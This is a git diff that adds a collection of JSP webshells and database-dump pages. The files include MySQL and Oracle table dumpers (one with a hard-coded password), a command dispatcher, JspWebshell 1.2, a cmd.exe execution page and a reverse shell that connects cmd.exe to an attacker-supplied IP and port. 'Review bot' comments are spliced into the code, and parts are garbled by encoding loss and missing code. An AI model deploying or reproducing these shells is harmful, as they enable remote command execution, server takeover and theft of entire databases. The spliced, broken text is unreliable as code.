diff --git a/drag/mysql_jsp脱裤.txt b/drag/mysql_jsp脱裤.txt new file mode 100644 index 0000000..54ca712 --- /dev/null +++ b/drag/mysql_jsp脱裤.txt @@ -0,0 +1,89 @@ +<%@ page import="java.sql.*" %> +<%@ page import="java.util.*" %> +<%@ page import="java.io.*" %> +<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> +<% +try { + //±¸·ގļ�ľ�¾¶ + String backupDir = "/home/tomcat-oa/webapps/ROOT/video/ab1/"; + String ex=".txt"; + String driver = "com.mysql.jdbc.Driver"; + + String url = "jdbc:mysql://localhost:3306/oa"; + String username = "oa"; + String password = "LOa2(2.DX,v>15^td8nWe!L"; + + Class.forName(driver); + Connection conn = DriverManager.getConnection(url, username, password); + + // Get tables + DatabaseMetaData dmd = conn.getMetaData(); + ResultSet rs = dmd.getTables(null, null, "%", null); + ArrayList tables = new ArrayList(); + while (rs.next()) { + tables.add(rs.getString(3)); + } + rs.close(); + + + + ResultSetMetaData rsmd = null; + Statement stmt = conn.createStatement(); + for (String table : tables) { + + rs = stmt.executeQuery("SHOW CREATE TABLE " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + /* + * mysql> SHOW CREATE TABLE t\G + *************************** 1. row *************************** + * Table: t + * Create Table: CREATE TABLE t ( + * id int(11) default NULL auto_increment, + * s char(60) default NULL, + * PRIMARY KEY (id) + * ) TYPE=MyISAM + */ + // JDBC is 1-based, Java is not !? +// osw.append(rs.getString(2) + "\n\n"); + } + rs.close(); + + out.println("Dumping data for table " + table + "...
"); + OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8"); + BufferedWriter bw=new BufferedWriter(osw); + rs = stmt.executeQuery("SELECT * FROM " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + bw.append("INSERT INTO " + table + " VALUES("); + // JDBC is 1-based, Java is not !? + for (int col = 1; col <= rsmd.getColumnCount(); col++) { + bw.append("'"); + if (rs.getString(col) == null) + bw.append(""); + else + bw.append(rs.getString(col)); + if (col == rsmd.getColumnCount()) + bw.append("'"); + else + bw.append("',"); + } + bw.append(");"); + bw.newLine(); + } + bw.flush(); + bw.close(); + osw.close(); + rs.close(); + } + stmt.close(); + + out.println("backup is ok"); + + conn.close(); +} catch (Exception e) { + response.setStatus(200); + e.printStackTrace(); +} +out.println("

finished

"); +%> diff --git a/drag/oracle_jsp脱裤.txt b/drag/oracle_jsp脱裤.txt new file mode 100644 index 0000000..efcd7cd --- /dev/null +++ b/drag/oracle_jsp脱裤.txt @@ -0,0 +1,321 @@ +<%@ page language="java" import="java.util.*" pageEncoding="GBK"%> + +<%@ page import="oracle.jdbc.*"%> + +<%@ page import="java.sql.*" %> + +<%@ page contentType="text/html; charset=GBK" %> + +<%@ page import="java.io.*" %> + +<% + +String path = request.getContextPath(); + +String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; + +%> + + + + + + + + + + + + XXOO + + + + + + + + + + + + + + + + + + + + <% + + String url = "http://" + request.getServerName() + ":" + request.getServerPort() + request.getContextPath()+request.getServletPath(); + + Class.forName("oracle.jdbc.driver.OracleDriver").newInstance(); + + ResultSet rs=null; + + ResultSet rs_column=null; + + ResultSet rs_dump=null; + + String oraUrl="jdbc:oracle:thin:@192.168.1.81:1521:db"; + + String oraUser="username"; + + String oraPWD="password"; + + int size=30000; + + try + + { + + DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver()); + + } + + catch (SQLException e){ + + out.print("filed!!"); + + } + + try + + { + + Connection conn=DriverManager.getConnection(oraUrl,oraUser,oraPWD); + + conn.setAutoCommit(false); + + if (request.getParameter("table") == null || request.getParameter("table").equals("")) + + { + + out.print("xixi...
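Review bot: The scriptlet at the top of `drag/mysql_jsp脱裤.txt` commits a database account and password as string literals next to an absolute server path (`String password = ...`, `backupDir`), so the credential has to be treated as exposed and rotated, not just deleted in a later commit. The page then writes one file of `INSERT` statements per table into a directory under `webapps/ROOT`, with no access check anywhere in the hunk, so every dump is retrievable by anyone who can reach the site. If the file is kept as a detection sample it should say so and carry no live values: open it with `<%-- SAMPLE: unauthenticated full-database export page; credentials and paths redacted; for detection testing only --%>` and replace the literals with placeholders. The same labelling gap applies to `drag/oracle_jsp脱裤.txt` and to the `.jsp` files under `jsp/hackk8/JSP/`, which are committed under an extension a servlet container will execute if this tree is ever served.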
"); + + Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt.executeQuery("select table_name from all_tables"); + + while(rs.next()) + + { + + out.print("");out.print(rs.getString(1));out.print("
"); + + } + + rs.close(); + + stmt.close(); + + } + + else + + { + + out.print("Current table : "+request.getParameter("table")); + + String sql_count="select count(*) from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_column="select * from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_columns_count="select count(*) from "+request.getParameter("table"); + + //String sql_dump="select rownom ro,* from T_SYS_USER"; + + Statement stmt_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_column=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_columns_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt_count.executeQuery(sql_count); + + rs_column=stmt_column.executeQuery(sql_column); + + ResultSet rs_columns_count=null; + + rs_columns_count=stmt_columns_count.executeQuery(sql_columns_count); + + + + conn.commit(); + + int count=0; + + while(rs.next()) + + { + + count=Integer.parseInt(rs.getString(1)); + + //out.print(count); + + } + + int columns_count=0; + + while(rs_columns_count.next()) // Total number of records + + { + + columns_count=Integer.parseInt(rs_columns_count.getString(1)); + + out.print("
The number of records : "+columns_count+"
"); + + } + + //out.print(columns_count); + + int column_num=1; + + //out.print("");out.print(""); + + String sql_dump="select * from (select rownum ro "; //SELECT + + while(rs_column.next()) + + { + + //out.print(rs_column.getString(3));out.print("\r"); + + sql_dump+=","; + + sql_dump+=rs_column.getString(3); + + column_num+=1; + + + + } + + rs_column.close(); + + rs.close(); //close + + stmt_count.close(); + + stmt_column.close(); + + sql_dump+=" from "+request.getParameter("table")+" where rownum<="; + + int mark=0; + + mark=columns_count; + + out.print("


Please download:
"); + + while(true) + + { + + if(mark<=size) //one txt count + + { mark=0; } + + else + + { mark=mark-size; } + + String dump=sql_dump+columns_count+") where ro>="+mark; + + columns_count-=size; + + Statement stmt_dump=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs_dump= stmt_dump.executeQuery(dump); + + conn.commit(); + + String filename = request.getRealPath(request.getParameter("table")+"-"+mark+".txt"); + + java.io.File f = new java.io.File(filename); + + if(!f.exists()) + + { f.createNewFile(); } + + try + + { + + PrintWriter pw = new PrintWriter(new FileOutputStream(filename)); + + while(rs_dump.next()) + + { + + column_num=1; + + while(column_num<=count) + + { + + pw.print(rs_dump.getString(column_num)); + + pw.print(","); + + column_num+=1; + + } + + pw.println(""); + + } + + pw.close(); + + } + + catch(IOException e) { + + out.println(e.getMessage()); + + } + + out.println("
"+request.getParameter("table")+"-"+mark+".txt
"); + + if(mark==0) + + { + + rs_dump.close(); + + stmt_dump.close(); + + break; + + } + + } + + } + + conn.close(); + + } catch (SQLException e) + + { + + System.out.println(e.toString()); + + out.print(e.toString()); + + } + + %> + + + + + + diff --git a/jsp/hackk8/JSP/Customize.jsp b/jsp/hackk8/JSP/Customize.jsp new file mode 100644 index 0000000..d3acce2 --- /dev/null +++ b/jsp/hackk8/JSP/Customize.jsp 
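Review bot: Every query in the `else` branch is built by concatenating `request.getParameter("table")` into SQL (`sql_count`, `sql_column`, `sql_columns_count`, `sql_dump`), and the same value is echoed into the HTML unescaped and used in the file name passed to `request.getRealPath(...)`. With no authentication in the hunk, one request parameter therefore controls the SQL text, the path written under the web application directory and the markup returned. For anyone hunting this page, the visible behaviour is a request carrying `table=` followed by fetches of `<table>-<offset>.txt` from the application root; a header comment such as `<%-- reads the table name from ?table= and writes <table>-<n>.txt into the webapp directory in chunks of 30000 rows --%>` would record that. The final `catch` also prints `e.toString()` to the response, which discloses driver and schema error text.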
@@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="k8"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else 
if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar b/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar new file mode 100644 index 0000000..f81f6a1 Binary files /dev/null and b/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar differ diff --git a/jsp/hackk8/JSP/Java Shell.jsp b/jsp/hackk8/JSP/Java Shell.jsp new file mode 100644 index 0000000..f15e864 --- /dev/null +++ b/jsp/hackk8/JSP/Java Shell.jsp 
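Review bot: The only gate in `Customize.jsp` is the parameter name held in `Pwd` (`"k8"`): its value is read as the action selector `Z` and is never compared with a secret, so anyone who knows the name reaches every branch, including `Z.equals("M")`, which passes `z1`/`z2` to `Runtime.getRuntime().exec(c)`. Nothing in the dispatcher checks the caller, the path in `z1`, or the content written by branch `D`. The helper bodies in the `<%! %>` declaration are partly missing in this rendering, so only the dispatcher can be reviewed here. For detection, the stable features visible in the hunk are the fixed request fields `z0`, `z1`, `z2` and the response framing `->|` … `|<-`; a header comment should document them, for example `<%-- SAMPLE: single-letter command dispatcher (A–Q) keyed by parameter "k8"; responses framed by ->| and |<- --%>`.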
@@ -0,0 +1,125 @@ +package enigma.shells.jython; + +import java.io.*; +import java.awt.*; +import javax.swing.*; + +import enigma.console.*; +import enigma.console.java2d.*; + +import org.python.core.*; +import org.python.util.*; + +public class JythonShell extends JPanel implements Runnable { + public static int DEFAULT_ROWS = 20; + public static int DEFAULT_COLUMNS = 80; + public static int DEFAULT_SCROLLBACK = 100; + + public PrintStream out; + + public Console console; + public Java2DTextWindow text; + public JScrollPane scrollPane; + public PythonInterpreter interp; + + private Color colorBackground = new Color(0, 0, 0); + private Color colorForeground = new Color(187, 187, 187); + private Color colorError = new Color(187, 0, 0); + private Color colorCursor = new Color(187, 187, 0); + + public JythonShell() { + this(null, Py.getSystemState()); + } + + public JythonShell(PyObject dict) { + this(dict, Py.getSystemState()); + } + + public JythonShell(int columns, int rows, int scrollback) { + this(null, Py.getSystemState(), columns, rows, scrollback); + } + + public JythonShell(PyObject dict, PySystemState systemState) { + this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK); + } + + public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) { + super(new BorderLayout()); + + text = new Java2DTextWindow(columns, rows, scrollback); + text.setBackground(colorBackground); + + scrollPane = new JScrollPane(); + scrollPane.setViewportView(text); + + add(scrollPane, BorderLayout.CENTER); + + console = new DefaultConsoleImpl(text); + out = console.getOutputStream(); + + interp = new PythonInterpreter(dict, systemState); + interp.setOut(out); + interp.setErr(out); + } + + public void run() { + int pos = 0; + int tbs = 4; + + String line = ""; + String command = ""; + + for (;;) { + String space = ""; + for (int i = 0; i < pos * tbs; i++) { + space += " "; + } + + try { + console.setTextAttributes(new 
TextAttributes(colorCursor)); + + if (pos > 0) { + out.print(space + "... "); + } else { + out.print(">> "); + } + + console.setTextAttributes(new TextAttributes(colorForeground)); + + line = console.readLine().trim(); + if (line.length() == 0 && pos > 0) { + pos--; + } else if (line.endsWith(":")) { + command += space + line + "\n"; + pos++; + } else { + command += space + line + "\n"; + } + + if (pos == 0) { + interp.exec(command); + command = ""; + } + } catch (Exception e) { + console.setTextAttributes(new TextAttributes(colorError)); + + e.printStackTrace(); + command = ""; + } + } + } + + public static void main(String[] argv) { + PySystemState.initialize(System.getProperties(), null, argv); + + JFrame frame = new JFrame("Jython Console"); + JythonShell console = new JythonShell(); + + frame.add(console, BorderLayout.CENTER); + frame.pack(); + frame.setVisible(true); + frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + console.run(); + } +} \ No newline at end of file diff --git a/jsp/hackk8/JSP/JspWebshell 1.2.jsp b/jsp/hackk8/JSP/JspWebshell 1.2.jsp new file mode 100644 index 0000000..4ce0fcf --- /dev/null +++ b/jsp/hackk8/JSP/JspWebshell 1.2.jsp @@ -0,0 +1,788 @@ +<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %> +<% +/** + *
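Review bot: `Java Shell.jsp` holds a plain Java class (`package enigma.shells.jython;` … `public class JythonShell extends JPanel`), not a JSP, so the file name and extension do not match its content and a container would not translate it; it belongs in a `JythonShell.java` source file. The three defaults are declared `public static int`, so any code can reassign them; `public static final int DEFAULT_ROWS = 20;` (and likewise for `DEFAULT_COLUMNS` and `DEFAULT_SCROLLBACK`) is what the usage implies. `main` builds and shows the Swing components on the main thread and then calls `console.run()`, whose `for (;;)` loop never exits. The class has no Javadoc; it should at least state that `interp.exec(command)` executes whatever is typed at the console inside the running JVM.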

Title:JspWebshell

+ * + *

Description: jspվ

+ * + *

Copyright:[B.C.T] Copyright (c) 2006

+ * + *

Company: zero.cnbct.org

+ * PS:СܴȤдϵQQ:48124012 + * @version 1.2 + */ + String path=""; + String selfName=""; + boolean copyfinish=false; +%> +<% selfName=request.getRequestURI(); + // String editfile=""; + String editfile=request.getParameter("editfile"); + if (editfile!=null) + {editfile=new String(editfile.getBytes("ISO8859_1")); + } + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); +%> +<%! + String _password ="111";// + public String readAllFile(String filePathName) throws IOException + { + FileReader fr = new FileReader(filePathName); + int count = fr.read(); + String res=""; + while(count != -1) + { + //System.out.print((char)count); + res=res+(char)count; + count = fr.read(); + if(count == 13) + { + fr.skip(1); + } + } + fr.close(); + return res; + } +public void writeFile(String filePathName,String args) throws IOException +{ +FileWriter fw = new FileWriter(filePathName); +PrintWriter out=new PrintWriter(fw); +out.write(args); +out.println(); +out.flush(); +fw.close(); +out.close(); +} +public boolean createFile(String filePathName) throws IOException +{ +boolean result = false; +File file = new File(filePathName); +if(file.exists()) +{ +System.out.println("ļѾڣ"); +} +else +{ +file.createNewFile(); +result = true; +System.out.println("ļѾ"); +} +return result; +} +public boolean createFolder(String fileFolderName) +{ +boolean result = false; +try +{ +File file = new File(fileFolderName); +if(file.exists()) +{ +//file.delete(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +else +{ +file.mkdir(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} + +public boolean DeleteFolder(String filefolderName) +{ +boolean result = false; +try +{ +File file = new File(filefolderName); +if(file.exists()) +{ +file.delete(); +System.out.println("Ŀ¼ɾ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "\"" + cmd + "\""; + } finally { + return retStr; + } + } + public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} +class EnvServlet +{ + public long timeUse=0; + public Hashtable htParam=new Hashtable(); + private Hashtable htShowMsg=new Hashtable(); + public void setHashtable() + { + Properties me=System.getProperties(); + Enumeration em=me.propertyNames(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=me.getProperty(strKey); + htParam.put(strKey,strValue); + } + } + public void getHashtable(String strQuery) + { + Enumeration em=htParam.keys(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=new String(); + if(strKey.indexOf(strQuery,0)>=0) + { + strValue=(String)htParam.get(strKey); + htShowMsg.put(strKey,strValue); + } + } + } + public String queryHashtable(String strKey) + { + strKey=(String)htParam.get(strKey); + return strKey; + } +/* public long test_int() + { + long timeStart = System.currentTimeMillis(); + int 
i=0; + while(i<3000000)i++; + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + } + public long test_sqrt() + { + long timeStart = System.currentTimeMillis(); + int i=0; + double db=(double)new Random().nextInt(1000); + while(i<200000){db=Math.sqrt(db);i++;} + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + }*/ +} +%> +<% + EnvServlet env=new EnvServlet(); + env.setHashtable(); + //String action=new String(" "); + //String act=new String("action"); + //if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act); +%> + + + + +JspWebShell By + + + + +<% +//session.setMaxInactiveInterval(_sessionOutTime * 60); +String password=request.getParameter("password"); +if (password == null && session.getAttribute("password") == null) { + +%> + +
+
+ + + +
+ + + + + + + + + +
 8JspWebShell + version 1.2¼ :::...Power By +
+ + +
+ +<% + + } else { + + if (session.getAttribute("password") == null) { + + if (validate(password) == false) { + out.println("
  • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } +%> + <% + File tmpFile = null; + String delfile=""; + String delfile1=""; + String editpath=""; + delfile1=request.getParameter("delfile"); + editpath=request.getParameter("filepath"); + if (delfile1!=null) + {delfile=new String(delfile1.getBytes("ISO8859_1")); + } + if ( delfile1!= null) { + // out.print(delfile); + tmpFile = new File(delfile); + if (! tmpFile.delete()) { + out.print( "ɾʧ
    \n"); + } + } +%> + <%String editfilecontent=null; + String editfilecontent1=request.getParameter("content"); + // out.println(editfilecontent1); + //String save=request.getParameter("save"); + if (editfilecontent1!=null) + {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));} + // out.print(editfile); + //out.print(editfilecontent); + if (editfile!=null&editfilecontent!=null) + {try {writeFile(editfile,editfilecontent);} + catch (Exception e) {out.print("дʧ");} + out.print("дɹ"); + } + %> +<%request.setCharacterEncoding("GBK");%> +<%//String editfile=request.getParameter("editfile"); +//out.print(editfile); +if (request.getParameter("jsptz")!=null) +{%> +
    +
    + + + + + + + +
    ز +
    +
    + + + + + + + +
    JAVAز +
    +
    +
    +
    + +<%} +else{ +if (editfile!=null)//if edit +{ +%> +
    + + + + +
    +

    ַ + +

    +

    + + +

    +
    +

     

    +<%} +else{%> + + + + + + + + + + + + <%=path1%>" ENCTYPE="multipart/form-data"> + + + + + + <% String fileexe=""; + String dir=""; + String deldir=""; + String scrfile=""; + String dstfile=""; + fileexe=request.getParameter("fileexe"); + dir=request.getParameter("dir"); + deldir=request.getParameter("deldir"); + scrfile=request.getParameter("scrfile"); + dstfile=request.getParameter("dstfile"); + if (fileexe!=null) + { + //out.print(path+fileexe); + createFile(path+fileexe); + } + if (dir!=null) + { + //out.print(path+dir); + createFolder(path+dir); + } + if (deldir!=null) + { + //out.print(deldir); + DeleteFolder(deldir); + } + if (scrfile!=null&dstfile!=null) + { + //out.print(scrfile); + //out.print(dstfile); + copyfinish=fileCopy(scrfile, dstfile) ; + } + %> + + + + + + <%//ϴ + String tempfilename=""; + String up=request.getParameter("up"); + // String tempfilepath=request.getParameter("filepath"); + // out.print(tempfilepath); + if(up!=null) + { + tempfilename=(String)session.getId(); + //String tempfilename=request.getParameter("file"); + File f1=new File(tempfilepath,tempfilename); + int n; + try + { + InputStream in=request.getInputStream(); + BufferedInputStream my_in=new BufferedInputStream(in); + FileOutputStream fout=new FileOutputStream(f1); + BufferedOutputStream my_out=new BufferedOutputStream(fout); + byte[] b=new byte[10000]; + while((n=my_in.read(b))!=-1) + { + my_out.write(b,0,n); + } + my_out.flush(); + my_out.close(); + fout.close(); + my_in.close(); + in.close(); + // out.print("ļɹ!
    "); + } + catch(IOException e) + { + out.print("ļʧ!"); + } + + try + { + RandomAccessFile random1=new RandomAccessFile(f1,"r"); + random1.readLine(); + String filename=random1.readLine(); + byte[] b=filename.getBytes("ISO-8859-1"); + filename=new String(b); + int pointer=filename.lastIndexOf('\\'); + filename=filename.substring(pointer+1,filename.length()-1); + File f2=new File(tempfilepath,filename); + RandomAccessFile random2=new RandomAccessFile(f2,"rw"); + random1.seek(0); + for(int i=1; i<=4; i++) + { + String tempstr=random1.readLine(); + } + long startPoint=random1.getFilePointer(); + random1.seek(random1.length()); + long mark=random1.getFilePointer(); + int j=0; + long endPoint=0; + while((mark>=0)&&(j<=5)) + { + mark--; + random1.seek(mark); + n=random1.readByte(); + if(n=='\n') + + { + j++; + endPoint=random1.getFilePointer(); + } + } + long length=endPoint-startPoint+1; + int order=(int)(length/10000); + int left=(int)(length%10000); + byte[] c=new byte[10000]; + random1.seek(startPoint); + for(int i=0; i + + + + +
    JspWebShell + version 1.0(վĿ¼:<%=config.getServletContext().getRealPath("/")%>)
    + <% + File[] fs = File.listRoots(); + for (int i = 0; i < fs.length; i++){ + %> + ش(<%=fs[i].getPath()%>) + + <%}%> +
    +
    + + +
    +

    + <% + String cmd = ""; + InputStream ins = null; + String result = ""; + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command");result = exeCmd(cmd);%> + <%=result == "" ? " " : result%> + <%}%> +

    + JSP̽
    + ļ + + +
    + ļ + + +
    + ļ + Ƶ + + +
    <%if(copyfinish==true) out.print("Ƴɹ");%>
    + <% try { + //path=request.getParameter("path"); + //if(path==null) + //path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%>     ɾ
    + <% } + + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +  
    + <% try { + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%> + <%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">༭ +   ɾ
    + <% } + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +
    +

    Power By [B.C.T] QQ:48124012

    +

     

    +<%}//if edit +} +} +%> + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/cmdjsp.jsp b/jsp/hackk8/JSP/cmdjsp.jsp new file mode 100644 index 0000000..2bd63ba --- /dev/null +++ b/jsp/hackk8/JSP/cmdjsp.jsp @@ -0,0 +1,31 @@ +// note that linux = cmd and windows = "cmd.exe /c + cmd" + +
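Review bot: `exeCmd` hands `request.getParameter("command")` straight to `runtime.exec(cmd)`, and the file helpers act on `delfile`, `editfile`, `deldir`, `scrfile`/`dstfile` and `path` exactly as received, so the page's entire protection is `validate`, which compares against the hard-coded `_password ="111"` and then stores the password itself in the session. The `finally` block in `exeCmd` returns `retStr` and so discards any exception raised in the `try`, and `result == ""` compares references, not contents. Much of the markup and the GBK comments were lost in this rendering, so the upload section is reviewed only as far as the visible lines go. The file has no header saying what it is; something like `<%-- SAMPLE: JspWebshell 1.2: command execution, file edit/delete/copy and upload driven by request parameters; gate is a static password --%>` would state what the parameter names already show.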
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
    +
    + diff --git a/jsp/hackk8/JSP/jsp-reverse.jsp b/jsp/hackk8/JSP/jsp-reverse.jsp new file mode 100644 index 0000000..6ce64c9 --- /dev/null +++ b/jsp/hackk8/JSP/jsp-reverse.jsp @@ -0,0 +1,90 @@ +// backdoor.jsp + + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +
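Review bot: `cmdjsp.jsp` concatenates the `cmd` request parameter into `Runtime.getRuntime().exec("cmd.exe /C " + cmd)` and prints the collected output through `<%=output %>` unescaped, with no access check anywhere in the hunk. The first line, `// note that linux = cmd ...`, sits outside any scriptlet and is therefore sent to the browser as page text; it should be a JSP comment, `<%-- note that linux = cmd and windows = "cmd.exe /c + cmd" --%>`. The reader `sI` is never closed. On the hosting side, the behaviour to alert on is the servlet container's Java process starting `cmd.exe`.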

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +


    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + diff --git a/jsp/hackk8/JSP/jspspy有屏幕.txt b/jsp/hackk8/JSP/jspspy有屏幕.txt new file mode 100644 index 0000000..570d090 --- /dev/null +++ b/jsp/hackk8/JSP/jspspy有屏幕.txt 
